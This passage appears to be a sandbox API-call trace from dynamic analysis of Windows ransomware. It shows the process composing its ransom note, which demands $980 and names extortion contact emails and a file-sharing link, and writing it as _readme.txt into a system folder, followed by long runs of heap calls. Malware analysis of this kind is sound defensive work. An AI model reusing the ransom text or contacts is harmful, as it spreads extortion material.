recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.698] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.699] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.699] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.700] CloseHandle (hObject=0x690) returned 1 [0173.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.700] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e5254c0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e5254c0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.700] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e5254c0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e5254c0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.700] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.700] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e5254c0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e5254c0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e5254c0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.700] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e5254c0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e5254c0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e5254c0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.700] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.701] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: 